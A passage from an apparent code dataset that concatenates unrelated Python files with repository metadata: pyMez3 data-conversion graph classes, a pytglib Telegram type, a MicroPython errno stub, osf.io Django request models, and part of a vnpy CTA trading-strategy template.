"Dictionary",XmlTupleString_to_Dictionary,node_description="Tuple Line")
self.add_node("PickleFile","Dictionary",Dictionary_to_PickleFile,
"Dictionary",PickleFile_to_Dictionary,node_description="Pickled File")
self.add_node("ListList","Dictionary",Dictionary_to_ListList,
"Dictionary",ListList_to_Dictionary,node_description="List of lists")
self.add_node("HeaderList","Dictionary",Dictionary_to_HeaderList,
"Dictionary",HeaderList_to_Dictionary,node_description="Header List")
self.add_node("DataFrame","Dictionary",Dictionary_to_DataFrame,
"Dictionary",DataFrame_to_Dictionary,node_description="Pandas DataFrame")
self.add_node("AsciiDataTable","DataFrame",DataFrame_to_AsciiDataTable,
"DataFrame",AsciiDataTable_to_DataFrame,node_description="AsciiDataTable")
self.add_node("MatFile","AsciiDataTable",AsciiTable_to_MatFile,
"AsciiDataTable",MatFile_to_AsciiDataTableKeyValue,node_description="Matlab")
self.add_node("ExcelFile","DataFrame",DataFrame_to_ExcelFile,
"DataFrame",ExcelFile_to_DataFrame,node_description="excel")
self.add_node("HdfFile","DataFrame",DataFrame_to_HdfFile,
"DataFrame",HdfFile_to_DataFrame,node_description="hdf file")
self.add_node("CsvFile","DataFrame",DataFrame_to_CsvFile,
"DataFrame",CsvFile_to_DataFrame,node_description="CSV File")
self.add_node("HtmlFile","DataFrame",DataFrame_to_HtmlFile,
"DataFrame",HtmlFile_to_DataFrame,node_description="HTML Table File")
self.add_node("HtmlTableString","HtmlFile",HtmlFile_to_HtmlString,
"HtmlFile",HtmlString_to_HtmlFile,node_description="HTML Table String")
class TwoPortParameterGraph(Graph):
"""TwoPortParamterGraph is a content graph for two-port parameters,
it transforms between S,T,Y,Z,ABCD and H parameters and matrix versions.
#!python
defaults={"graph_name":"Two Port Parameter Graph",
"node_names":["SFrequencyList",'SFrequencyMatrixList'],
"node_descriptions":["S Parameters","S Parameters in a Matrix"],
"current_node":'SFrequencyList',
"state":[1,0],
"data":[[1.0,.9,.436,.436,.9]],
"edge_2_to_1":FrequencyMatrixList_to_FrequencyList,
"edge_1_to_2":FrequencyList_to_FrequencyMatrixList,
"frequency_units":"GHz",
"Z01":50,
"Z02":50 }
"""
def __init__(self,**options):
defaults={"graph_name":"Two Port Parameter Graph",
"node_names":["SFrequencyList",'SFrequencyMatrixList'],
"node_descriptions":["S Parameters","S Parameters in a Matrix"],
"current_node":'SFrequencyList',
"state":[1,0],
"data":[[1.0,.9,.436,.436,.9]],
"edge_2_to_1":FrequencyMatrixList_to_FrequencyList,
"edge_1_to_2":FrequencyList_to_FrequencyMatrixList,
"frequency_units":"GHz",
"Z01":50,
"Z02":50 }
graph_options={}
for key,value in defaults.items():
graph_options[key]=value
for key,value in options.items():
graph_options[key]=value
Graph.__init__(self,**graph_options)
self.add_node("TFrequencyMatrixList",
"SFrequencyMatrixList",SFrequencyMatrixList_to_TFrequencyMatrixList,
"SFrequencyMatrixList",TFrequencyMatrixList_to_SFrequencyMatrixList,
"T Parameters in a Matrix")
self.add_node("TFrequencyList",
"TFrequencyMatrixList",FrequencyMatrixList_to_FrequencyList,
"TFrequencyMatrixList",FrequencyList_to_FrequencyMatrixList,
"T Parameters")
self.add_node("ZFrequencyList",
"SFrequencyList",SFrequencyList_to_ZFrequencyList,
"TFrequencyList",ZFrequencyList_to_TFrequencyList,
"Z Parameters")
self.add_node("ZFrequencyMatrixList",
"ZFrequencyList",FrequencyList_to_FrequencyMatrixList,
"ZFrequencyList",FrequencyMatrixList_to_FrequencyList,
"Z Parameters in a matrix")
self.add_node("ABCDFrequencyList",
"ZFrequencyList",ZFrequencyList_to_ABCDFrequencyList,
"ZFrequencyList",ABCDFrequencyList_to_ZFrequencyList,
"ABCD Parameters")
self.add_node("ABCDFrequencyMatrixList",
"ABCDFrequencyList",FrequencyList_to_FrequencyMatrixList,
"ABCDFrequencyList",FrequencyMatrixList_to_FrequencyList,
"ABCD Parameters in a matrix")
self.add_node("HFrequencyList",
"ABCDFrequencyList",ABCDFrequencyList_to_HFrequencyList,
"ZFrequencyList",HFrequencyList_to_ZFrequencyList,
"h Parameters")
self.add_node("HFrequencyMatrixList",
"HFrequencyList",FrequencyList_to_FrequencyMatrixList,
"HFrequencyList",FrequencyMatrixList_to_FrequencyList,
"H Parameters in a matrix")
self.add_node("YFrequencyList",
"ABCDFrequencyList",ABCDFrequencyList_to_YFrequencyList,
"HFrequencyList",YFrequencyList_to_HFrequencyList,
"Y Parameters")
self.add_node("YFrequencyMatrixList",
"YFrequencyList",FrequencyList_to_FrequencyMatrixList,
"YFrequencyList",FrequencyMatrixList_to_FrequencyList,
"Y Parameters in a matrix")
self.add_edge(begin_node="ZFrequencyMatrixList",
end_node="YFrequencyMatrixList",
edge_function=ZFrequencyMatrixList_to_YFrequencyMatrixList)
self.add_edge(begin_node="SFrequencyMatrixList",
end_node="ZFrequencyMatrixList",
edge_function=SFrequencyMatrixList_to_ZFrequencyMatrixList)
self.add_edge(begin_node="ZFrequencyMatrixList",
end_node="TFrequencyMatrixList",
edge_function=ZFrequencyMatrixList_to_TFrequencyMatrixList)
self.add_edge(begin_node="ABCDFrequencyList",
end_node="SFrequencyList",
edge_function=ABCDFrequencyList_to_SFrequencyList)
class DataTableGraph(Graph):
""" Class that transforms a row modelled header and metadata to several different data types
#!python
defaults={"graph_name":"Data Table Graph",
"node_names":['DataFrameDictionary','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame Dictionary","AsciiDataTable"],
"current_node":'DataFrameDictionary',
"state":[1,0],
"data":AsciiDataTable_to_DataFrameDictionary(TwoPortRawModel(os.path.join(TESTS_DIRECTORY,'TestFileTwoPortRaw.txt'))),
"edge_2_to_1":AsciiDataTable_to_DataFrameDictionary,
"edge_1_to_2":DataFrameDictionary_to_AsciiDataTable
}
"""
def __init__(self,**options):
defaults={"graph_name":"Data Table Graph",
"node_names":['DataFrameDictionary','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame Dictionary","AsciiDataTable"],
"current_node":'DataFrameDictionary',
"state":[1,0],
"data":AsciiDataTable_to_DataFrameDictionary(TwoPortRawModel(os.path.join(TESTS_DIRECTORY,'TestFileTwoPortRaw.txt'))),
"edge_2_to_1":AsciiDataTable_to_DataFrameDictionary,
"edge_1_to_2":DataFrameDictionary_to_AsciiDataTable
}
graph_options={}
for key,value in defaults.items():
graph_options[key]=value
for key,value in options.items():
graph_options[key]=value
Graph.__init__(self, **graph_options)
self.add_node("ExcelFile", "DataFrameDictionary", DataFrameDictionary_to_ExcelFile,
"DataFrameDictionary", ExcelFile_to_DataFrameDictionary,
node_description="Excel Workbook")
self.add_node("HdfFile", "DataFrameDictionary", DataFrameDictionary_to_HdfFile,
"DataFrameDictionary", HdfFile_to_DataFrameDictionary, node_description="HD5 File")
self.add_node("CsvFile", "AsciiDataTable", AsciiDataTable_to_CsvFile,
"AsciiDataTable", File_to_AsciiDataTable, node_description="CSV File")
self.add_node("HpFile", "AsciiDataTable", AsciiDataTable_to_HpFile,
"AsciiDataTable", File_to_AsciiDataTable, node_description="hp format File")
self.add_external_node(external_node_name="XMLDataTable", jump_into_node_begin="AsciiDataTable",
jump_into_node_function=AsciiDataTable_to_XmlDataTable,
external_node_description="XMLDataTable")
#-----------------------------------------------------------------------------
# Module Scripts
#TODO: Add test_Graph script currently lives in jupyter-notebooks
#-----------------------------------------------------------------------------
# Module Runner
if __name__ == '__main__':
pass | 49.816969 | 136 | 0.603793 | [
"Unlicense"
] | aricsanders/pyMez3 | Code/DataHandlers/GraphModels.py | 52,258 | Python |
from ..utils import Object
class ChatEventAction(Object):
"""
Represents a chat event
No parameters required.
"""
ID = "chatEventAction"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "ChatEventStickerSetChanged or ChatEventMemberLeft or ChatEventPermissionsChanged or ChatEventMemberJoined or ChatEventTitleChanged or ChatEventSlowModeDelayChanged or ChatEventDescriptionChanged or ChatEventInvitesToggled or ChatEventUsernameChanged or ChatEventMemberPromoted or ChatEventLocationChanged or ChatEventIsAllHistoryAvailableToggled or ChatEventMessagePinned or ChatEventPhotoChanged or ChatEventPollStopped or ChatEventMemberInvited or ChatEventMessageDeleted or ChatEventSignMessagesToggled or ChatEventMessageUnpinned or ChatEventMessageEdited or ChatEventLinkedChatChanged or ChatEventMemberRestricted":
if q.get("@type"):
return Object.read(q)
return ChatEventAction()
| 42.869565 | 653 | 0.792089 | [
"MIT"
] | iTeam-co/pytglib | pytglib/api/types/chat_event_action.py | 986 | Python |
"""
Module: 'uerrno' on esp32 1.12.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.12.0', version='v1.12 on 2019-12-20', machine='ESP32 module (spiram) with ESP32')
# Stubber: 1.3.2
EACCES = 13
EADDRINUSE = 98
EAGAIN = 11
EALREADY = 114
EBADF = 9
ECONNABORTED = 103
ECONNREFUSED = 111
ECONNRESET = 104
EEXIST = 17
EHOSTUNREACH = 113
EINPROGRESS = 115
EINVAL = 22
EIO = 5
EISDIR = 21
ENOBUFS = 105
ENODEV = 19
ENOENT = 2
ENOMEM = 12
ENOTCONN = 107
EOPNOTSUPP = 95
EPERM = 1
ETIMEDOUT = 110
errorcode = None
| 17.862069 | 135 | 0.69112 | [
"MIT"
] | AssimilatedGuy/micropython-stubs | stubs/micropython-esp32-1_12/uerrno.py | 518 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from include import IncludeManager
from osf.models.base import BaseModel, ObjectIDMixin
from osf.utils.workflows import RequestTypes
from osf.models.mixins import NodeRequestableMixin, PreprintRequestableMixin
class AbstractRequest(BaseModel, ObjectIDMixin):
class Meta:
abstract = True
objects = IncludeManager()
request_type = models.CharField(max_length=31, choices=RequestTypes.choices())
creator = models.ForeignKey('OSFUser', related_name='submitted_%(class)s', on_delete=models.CASCADE)
comment = models.TextField(null=True, blank=True)
@property
def target(self):
raise NotImplementedError()
class NodeRequest(AbstractRequest, NodeRequestableMixin):
""" Request for Node Access
"""
target = models.ForeignKey('AbstractNode', related_name='requests', on_delete=models.CASCADE)
class PreprintRequest(AbstractRequest, PreprintRequestableMixin):
""" Request for Preprint Withdrawal
"""
target = models.ForeignKey('Preprint', related_name='requests', on_delete=models.CASCADE)
| 31.135135 | 104 | 0.757813 | [
"Apache-2.0"
] | CenterForOpenScience/osf.io | osf/models/request.py | 1,152 | Python |
""""""
import os
import uuid
import bz2
import pickle
import traceback
import zlib
from abc import ABC
from copy import copy,deepcopy
from typing import Any, Callable
from logging import INFO, ERROR
from datetime import datetime
from vnpy.trader.constant import Interval, Direction, Offset, Status, OrderType, Color, Exchange
from vnpy.trader.object import BarData, TickData, OrderData, TradeData
from vnpy.trader.utility import virtual, append_data, extract_vt_symbol, get_underlying_symbol
from .base import StopOrder, EngineType
from vnpy.component.cta_grid_trade import CtaGrid, CtaGridTrade, LOCK_GRID
from vnpy.component.cta_position import CtaPosition
from vnpy.component.cta_policy import CtaPolicy # noqa
class CtaTemplate(ABC):
"""CTA策略模板"""
author = ""
parameters = []
variables = []
# 保存委托单编号和相关委托单的字典
# key为委托单编号
# value为该合约相关的委托单
active_orders = {}
def __init__(
self,
cta_engine: Any,
strategy_name: str,
vt_symbol: str,
setting: dict,
):
""""""
self.cta_engine = cta_engine
self.strategy_name = strategy_name
self.vt_symbol = vt_symbol
self.inited = False # 是否初始化完毕
self.trading = False # 是否开始交易
self.pos = 0 # 持仓/仓差
self.entrust = 0 # 是否正在委托, 0, 无委托 , 1, 委托方向是LONG, -1, 委托方向是SHORT
self.tick_dict = {} # 记录所有on_tick传入最新tick
self.active_orders = {}
# Copy a new variables list here to avoid duplicate insert when multiple
# strategy instances are created with the same strategy class.
self.variables = copy(self.variables)
self.variables.insert(0, "inited")
self.variables.insert(1, "trading")
self.variables.insert(2, "pos")
self.variables.insert(3, "entrust")
def update_setting(self, setting: dict):
"""
Update strategy parameter wtih value in setting dict.
"""
for name in self.parameters:
if name in setting:
setattr(self, name, setting[name])
@classmethod
def get_class_parameters(cls):
"""
Get default parameters dict of strategy class.
"""
class_parameters = {}
for name in cls.parameters:
class_parameters[name] = getattr(cls, name)
return class_parameters
def get_parameters(self):
"""
Get strategy parameters dict.
"""
strategy_parameters = {}
for name in self.parameters:
strategy_parameters[name] = getattr(self, name)
return strategy_parameters
def get_variables(self):
"""
Get strategy variables dict.
"""
strategy_variables = {}
for name in self.variables:
strategy_variables[name] = getattr(self, name)
return strategy_variables
def get_data(self):
"""
Get strategy data.
"""
strategy_data = {
"strategy_name": self.strategy_name,
"vt_symbol": self.vt_symbol,
"class_name": self.__class__.__name__,
"author": self.author,
"parameters": self.get_parameters(),
"variables": self.get_variables(),
}
return strategy_data
def get_positions(self):
""" 返回持仓数量"""
pos_list = []
if self.pos > 0:
pos_list.append({
"vt_symbol": self.vt_symbol,
"direction": "long",
"volume": self.pos
})
elif self.pos < 0:
pos_list.append({
"vt_symbol": self.vt_symbol,
"direction": "short",
"volume": abs(self.pos)
})
return pos_list
@virtual
def on_timer(self):
pass
@virtual
def on_init(self):
"""
Callback when strategy is inited.
"""
pass
@virtual
def on_start(self):
"""
Callback when strategy is started.
"""
pass
@virtual
def on_stop(self):
"""
Callback when strategy is stopped.
"""
pass
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
pass
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
@virtual
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
pass
@virtual
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
pass
@virtual
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass
def buy(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send buy order to open a long position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_upper_limit(vt_symbol):
self.write_error(u'涨停价不做FAK/FOK委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.LONG,
offset=Offset.OPEN,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def sell(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send sell order to close a long position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_lower_limit(vt_symbol):
self.write_error(u'跌停价不做FAK/FOK sell委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.SHORT,
offset=Offset.CLOSE,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def short(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send short order to open as short position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_lower_limit(vt_symbol):
self.write_error(u'跌停价不做FAK/FOK short委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.SHORT,
offset=Offset.OPEN,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def cover(self, price: float, volume: float, stop: bool = False, lock: bool = False,
vt_symbol: str = '', order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None, grid: CtaGrid = None):
"""
Send cover order to close a short position.
"""
if order_type in [OrderType.FAK, OrderType.FOK]:
if self.is_upper_limit(vt_symbol):
self.write_error(u'涨停价不做FAK/FOK cover委托')
return []
if volume == 0:
self.write_error(f'委托数量有误,必须大于0,{vt_symbol}, price:{price}')
return []
return self.send_order(vt_symbol=vt_symbol,
direction=Direction.LONG,
offset=Offset.CLOSE,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type,
order_time=order_time,
grid=grid)
def send_order(
self,
vt_symbol: str,
direction: Direction,
offset: Offset,
price: float,
volume: float,
stop: bool = False,
lock: bool = False,
order_type: OrderType = OrderType.LIMIT,
order_time: datetime = None,
grid: CtaGrid = None
):
"""
Send a new order.
"""
# 兼容cta_strategy的模板,缺省不指定vt_symbol时,使用策略配置的vt_symbol
if vt_symbol == '':
vt_symbol = self.vt_symbol
if not self.trading:
self.write_log(f'非交易状态')
return []
vt_orderids = self.cta_engine.send_order(
strategy=self,
vt_symbol=vt_symbol,
direction=direction,
offset=offset,
price=price,
volume=volume,
stop=stop,
lock=lock,
order_type=order_type
)
if len(vt_orderids) == 0:
self.write_error(f'{self.strategy_name}调用cta_engine.send_order委托返回失败,vt_symbol:{vt_symbol}')
# f',direction:{direction.value},offset:{offset.value},'
# f'price:{price},volume:{volume},stop:{stop},lock:{lock},'
# f'order_type:{order_type}')
if order_time is None:
order_time = datetime.now()
for vt_orderid in vt_orderids:
d = {
'direction': direction,
'offset': offset,
'vt_symbol': vt_symbol,
'price': price,
'volume': volume,
'order_type': order_type,
'traded': 0,
'order_time': order_time,
'status': Status.SUBMITTING
}
if grid:
d.update({'grid': grid})
grid.order_ids.append(vt_orderid)
self.active_orders.update({vt_orderid: d})
if direction == Direction.LONG:
self.entrust = 1
elif direction == Direction.SHORT:
self.entrust = -1
return vt_orderids
def cancel_order(self, vt_orderid: str):
"""
Cancel an existing order.
"""
if self.trading:
return self.cta_engine.cancel_order(self, vt_orderid)
return False
def cancel_all(self):
"""
Cancel all orders sent by strategy.
"""
if self.trading:
self.cta_engine.cancel_all(self)
def is_upper_limit(self, symbol):
"""是否涨停"""
tick = self.tick_dict.get(symbol, None)
if tick is None or tick.limit_up is None or tick.limit_up == 0:
return False
if tick.bid_price_1 == tick.limit_up:
return True
def is_lower_limit(self, symbol):
"""是否跌停"""
tick = self.tick_dict.get(symbol, None)
if tick is None or tick.limit_down is None or tick.limit_down == 0:
return False
if tick.ask_price_1 == tick.limit_down:
return True
def write_log(self, msg: str, level: int = INFO):
"""
Write a log message.
"""
self.cta_engine.write_log(msg=msg, strategy_name=self.strategy_name, level=level)
def write_error(self, msg: str):
"""write error log message"""
self.write_log(msg=msg, level=ERROR)
def get_engine_type(self):
"""
Return whether the cta_engine is backtesting or live trading.
"""
return self.cta_engine.get_engine_type()
def load_bar(
self,
days: int,
interval: Interval = Interval.MINUTE,
callback: Callable = None,
interval_num: int = 1
):
"""
Load historical bar data for initializing strategy.
"""
if not callback:
callback = self.on_bar
self.cta_engine.load_bar(self.vt_symbol, days, interval, callback, interval_num)
def load_tick(self, days: int):
"""
Load historical tick data for initializing strategy.
"""
self.cta_engine.load_tick(self.vt_symbol, days, self.on_tick)
def put_event(self):
"""
Put an strategy data event for ui update.
"""
if self.inited:
self.cta_engine.put_strategy_event(self)
def send_email(self, msg):
"""
Send email to default receiver.
"""
if self.inited:
self.cta_engine.send_email(msg, self)
def sync_data(self):
"""
Sync strategy variables value into disk storage.
"""
if self.trading:
self.cta_engine.sync_strategy_data(self)
class CtaSignal(ABC):
""""""
def __init__(self):
""""""
self.signal_pos = 0
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
pass
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
pass
def set_signal_pos(self, pos):
""""""
self.signal_pos = pos
def get_signal_pos(self):
""""""
return self.signal_pos
class TargetPosTemplate(CtaTemplate):
""""""
tick_add = 1
last_tick = None
last_bar = None
target_pos = 0
vt_orderids = []
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super(TargetPosTemplate, self).__init__(
cta_engine, strategy_name, vt_symbol, setting
)
self.variables.append("target_pos")
@virtual
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
self.last_tick = tick
if self.trading:
self.trade()
@virtual
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
self.last_bar = bar
@virtual
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
vt_orderid = order.vt_orderid
if not order.is_active() and vt_orderid in self.vt_orderids:
self.vt_orderids.remove(vt_orderid)
def set_target_pos(self, target_pos):
""""""
self.target_pos = target_pos
self.trade()
def trade(self):
""""""
self.cancel_all()
pos_change = self.target_pos - self.pos
if not pos_change:
return
long_price = 0
short_price = 0
if self.last_tick:
if pos_change > 0:
long_price = self.last_tick.ask_price_1 + self.tick_add
if self.last_tick.limit_up:
long_price = min(long_price, self.last_tick.limit_up)
else:
short_price = self.last_tick.bid_price_1 - self.tick_add
if self.last_tick.limit_down:
short_price = max(short_price, self.last_tick.limit_down)
else:
if pos_change > 0:
long_price = self.last_bar.close_price + self.tick_add
else:
short_price = self.last_bar.close_price - self.tick_add
if self.get_engine_type() == EngineType.BACKTESTING:
if pos_change > 0:
vt_orderids = self.buy(long_price, abs(pos_change))
else:
vt_orderids = self.short(short_price, abs(pos_change))
self.vt_orderids.extend(vt_orderids)
else:
if self.vt_orderids:
return
if pos_change > 0:
if self.pos < 0:
if pos_change < abs(self.pos):
vt_orderids = self.cover(long_price, pos_change)
else:
vt_orderids = self.cover(long_price, abs(self.pos))
else:
vt_orderids = self.buy(long_price, abs(pos_change))
else:
if self.pos > 0:
if abs(pos_change) < self.pos:
vt_orderids = self.sell(short_price, abs(pos_change))
else:
vt_orderids = self.sell(short_price, abs(self.pos))
else:
vt_orderids = self.short(short_price, abs(pos_change))
self.vt_orderids.extend(vt_orderids)
class CtaProTemplate(CtaTemplate):
"""
增强模板
"""
idx_symbol = None # 指数合约
exchange = Exchange.LOCAL
price_tick = 1 # 商品的最小价格跳动
symbol_size = 10 # 商品得合约乘数
margin_rate = 0.1 # 商品的保证金
# 委托类型
order_type = OrderType.LIMIT
cancel_seconds = 120 # 撤单时间(秒)
# 资金相关
max_invest_rate = 0.1 # 最大仓位(0~1)
max_invest_margin = 0 # 资金上限 0,不限制
max_invest_pos = 0 # 单向头寸数量上限 0,不限制
# 是否回测状态
backtesting = False
# 逻辑过程日志
dist_fieldnames = ['datetime', 'symbol', 'volume', 'price',
'operation', 'signal', 'stop_price', 'target_price',
'long_pos', 'short_pos']
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
self.position = None # 仓位组件
self.policy = None # 事务执行组件
self.gt = None # 网格交易组件
self.klines = {} # K线组件字典: kline_name: kline
self.cur_datetime = None # 当前Tick时间
self.cur_mi_tick = None # 最新的主力合约tick( vt_symbol)
self.cur_99_tick = None # 最新得指数合约tick( idx_symbol)
self.cur_mi_price = None # 当前价(主力合约 vt_symbol)
self.cur_99_price = None # 当前价(tick时,根据tick更新,onBar回测时,根据bar.close更新)
self.last_minute = None # 最后的分钟,用于on_tick内每分钟处理的逻辑
super(CtaProTemplate, self).__init__(
cta_engine, strategy_name, vt_symbol, setting
)
# 增加仓位管理模块
self.position = CtaPosition(strategy=self)
# 增加网格持久化模块
self.gt = CtaGridTrade(strategy=self)
# 增加指数合约
if 'idx_symbol' not in self.parameters:
self.parameters.append('idx_symbol')
if 'backtesting' not in self.parameters:
self.parameters.append('backtesting')
def update_setting(self, setting: dict):
"""
Update strategy parameter wtih value in setting dict.
"""
for name in self.parameters:
if name in setting:
setattr(self, name, setting[name])
symbol, self.exchange = extract_vt_symbol(self.vt_symbol)
if self.idx_symbol is None:
self.idx_symbol = get_underlying_symbol(symbol).upper() + '99.' + self.exchange.value
if self.vt_symbol != self.idx_symbol:
self.write_log(f'指数合约:{self.idx_symbol}, 主力合约:{self.vt_symbol}')
self.price_tick = self.cta_engine.get_price_tick(self.vt_symbol)
self.symbol_size = self.cta_engine.get_size(self.vt_symbol)
self.margin_rate = self.cta_engine.get_margin_rate(self.vt_symbol)
def sync_data(self):
"""同步更新数据"""
if not self.backtesting:
self.write_log(u'保存k线缓存数据')
self.save_klines_to_cache()
if self.inited and self.trading:
self.write_log(u'保存policy数据')
self.policy.save()
def save_klines_to_cache(self, kline_names: list = []):
"""
保存K线数据到缓存
:param kline_names: 一般为self.klines的keys
:return:
"""
if len(kline_names) == 0:
kline_names = list(self.klines.keys())
# 获取保存路径
save_path = self.cta_engine.get_data_path()
# 保存缓存的文件名
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_klines.pkb2'))
with bz2.BZ2File(file_name, 'wb') as f:
klines = {}
for kline_name in kline_names:
kline = self.klines.get(kline_name, None)
# if kline:
# kline.strategy = None
# kline.cb_on_bar = None
klines.update({kline_name: kline})
pickle.dump(klines, f)
def load_klines_from_cache(self, kline_names: list = []):
"""
从缓存加载K线数据
:param kline_names:
:return:
"""
if len(kline_names) == 0:
kline_names = list(self.klines.keys())
save_path = self.cta_engine.get_data_path()
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_klines.pkb2'))
try:
last_bar_dt = None
with bz2.BZ2File(file_name, 'rb') as f:
klines = pickle.load(f)
# 逐一恢复K线
for kline_name in kline_names:
# 缓存的k线实例
cache_kline = klines.get(kline_name, None)
# 当前策略实例的K线实例
strategy_kline = self.klines.get(kline_name, None)
if cache_kline and strategy_kline:
# 临时保存当前的回调函数
cb_on_bar = strategy_kline.cb_on_bar
# 缓存实例数据 =》 当前实例数据
strategy_kline.__dict__.update(cache_kline.__dict__)
kline_first_bar_dt = None
kline_last_bar_dt = None
if len(strategy_kline.line_bar) > 0:
kline_first_bar_dt = strategy_kline.line_bar[0].datetime
kline_last_bar_dt = strategy_kline.line_bar[-1].datetime
# 所有K线的最后时间
if last_bar_dt and strategy_kline.cur_datetime:
last_bar_dt = max(last_bar_dt, strategy_kline.cur_datetime)
else:
last_bar_dt = strategy_kline.cur_datetime
# 重新绑定k线策略与on_bar回调函数
strategy_kline.strategy = self
strategy_kline.cb_on_bar = cb_on_bar
self.write_log(f'恢复{kline_name}缓存数据:[{kline_first_bar_dt}] => [{kline_last_bar_dt}], bar结束时间:{last_bar_dt}')
self.write_log(u'加载缓存k线数据完毕')
return last_bar_dt
except Exception as ex:
self.write_error(f'加载缓存K线数据失败:{str(ex)}')
return None
def get_klines_snapshot(self):
"""返回当前klines的切片数据"""
try:
d = {
'strategy': self.strategy_name,
'datetime': datetime.now()}
klines = {}
for kline_name in sorted(self.klines.keys()):
klines.update({kline_name: self.klines.get(kline_name).get_data()})
kline_names = list(klines.keys())
binary_data = zlib.compress(pickle.dumps(klines))
d.update({'kline_names': kline_names, 'klines': binary_data, 'zlib': True})
return d
except Exception as ex:
self.write_error(f'获取klines切片数据失败:{str(ex)}')
return {}
def init_position(self):
"""
初始化Positin
使用网格的持久化,获取开仓状态的多空单,更新
:return:
"""
self.write_log(u'init_position(),初始化持仓')
pos_symbols = set()
remove_ids = []
if len(self.gt.up_grids) <= 0:
self.position.short_pos = 0
# 加载已开仓的空单数据,网格JSON
short_grids = self.gt.load(direction=Direction.SHORT, open_status_filter=[True])
if len(short_grids) == 0:
self.write_log(u'没有持久化的空单数据')
self.gt.up_grids = []
else:
self.gt.up_grids = short_grids
for sg in short_grids:
if len(sg.order_ids) > 0 or sg.order_status:
self.write_log(f'重置委托状态:{sg.order_status},清除委托单:{sg.order_ids}')
sg.order_status = False
sg.order_ids = []
short_symbol = sg.snapshot.get('mi_symbol', self.vt_symbol)
if sg.traded_volume > 0:
if sg.open_status and sg.volume== sg.traded_volume:
msg = f'{self.strategy_name} {short_symbol}空单持仓{sg.volume},已成交:{sg.traded_volume},不加载'
self.write_log(msg)
self.send_wechat(msg)
remove_ids.append(sg.id)
continue
pos_symbols.add(short_symbol)
self.write_log(u'加载持仓空单[ID:{},vt_symbol:{},价格:{}],[指数:{},价格:{}],数量:{}手'
.format(sg.id, short_symbol, sg.snapshot.get('open_price'),
self.idx_symbol, sg.open_price, sg.volume))
self.position.short_pos -= sg.volume
self.write_log(u'持久化空单,共持仓:{}手'.format(abs(self.position.short_pos)))
if len(remove_ids) > 0:
self.gt.remove_grids_by_ids(direction=Direction.SHORT,ids=remove_ids)
remove_ids = []
if len(self.gt.dn_grids) <= 0:
# 加载已开仓的多数据,网格JSON
self.position.long_pos = 0
long_grids = self.gt.load(direction=Direction.LONG, open_status_filter=[True])
if len(long_grids) == 0:
self.write_log(u'没有持久化的多单数据')
self.gt.dn_grids = []
else:
self.gt.dn_grids = long_grids
for lg in long_grids:
if len(lg.order_ids) > 0 or lg.order_status:
self.write_log(f'重置委托状态:{lg.order_status},清除委托单:{lg.order_ids}')
lg.order_status = False
lg.order_ids = []
# lg.type = self.line.name
long_symbol = lg.snapshot.get('mi_symbol', self.vt_symbol)
if lg.traded_volume > 0:
if lg.open_status and lg.volume == lg.traded_volume:
msg = f'{self.strategy_name} {long_symbol}多单持仓{lg.volume},已成交:{lg.traded_volume},不加载'
self.write_log(msg)
self.send_wechat(msg)
remove_ids.append(lg.id)
continue
pos_symbols.add(long_symbol)
self.write_log(u'加载持仓多单[ID:{},vt_symbol:{},价格:{}],[指数{},价格:{}],数量:{}手'
.format(lg.id, long_symbol, lg.snapshot.get('open_price'),
self.idx_symbol, lg.open_price, lg.volume))
self.position.long_pos += lg.volume
self.write_log(f'持久化多单,共持仓:{self.position.long_pos}手')
if len(remove_ids) > 0:
self.gt.remove_grids_by_ids(direction=Direction.LONG,ids=remove_ids)
self.position.pos = self.position.long_pos + self.position.short_pos
self.write_log(u'{}加载持久化数据完成,多单:{},空单:{},共:{}手'
.format(self.strategy_name,
self.position.long_pos,
abs(self.position.short_pos),
self.position.pos))
self.pos = self.position.pos
self.gt.save()
self.display_grids()
#if not self.backtesting:
